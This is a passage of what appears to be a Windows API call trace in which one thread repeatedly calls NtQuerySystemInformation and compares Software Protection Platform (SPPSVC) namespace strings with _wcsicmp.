NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0282.005] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0282.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0282.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0282.019] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0282.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0282.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0282.028] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd150, Length=0x28, ResultLength=0x0) [0282.040] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcfa0, Length=0x28, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0282.046] 